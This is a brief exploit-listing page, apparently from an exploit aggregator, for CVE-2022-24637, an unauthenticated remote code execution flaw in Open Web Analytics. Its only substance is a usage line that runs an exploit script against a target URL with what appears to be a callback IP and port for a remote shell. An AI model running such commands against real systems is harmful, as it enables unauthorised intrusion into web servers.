Share
## https://sploitus.com/exploit?id=4B1750D9-C959-5CFC-B566-F957C83C9950
# CVE-2022-24637
> Open Web Analytics (OWA) - Unauthenticated Remote Code Execution

- https://vulners.com/cve/CVE-2022-24637

## Example
```bash
python3 exploit.py -u admin -p hacker http://target.org 10.10.11.12 4444
```